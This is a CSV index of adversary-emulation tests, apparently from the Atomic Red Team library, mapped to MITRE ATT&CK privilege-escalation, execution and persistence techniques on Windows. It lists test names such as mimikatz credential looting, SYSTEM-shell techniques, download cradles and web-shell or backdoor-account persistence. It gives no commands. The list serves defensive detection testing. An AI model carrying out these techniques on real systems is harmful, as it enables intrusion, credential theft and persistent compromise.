privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
persistence,T1137.006,Office Application Startup: Add-ins,4,Persistent Code Execution Via Excel VBA Add-in File (XLAM),082141ed-b048-4c86-99c7-2b8da5b5bf48,powershell
persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM),f89e58f9-2b49-423b-ac95-1f3e7cfd8277,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1136.001,Create Account: Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
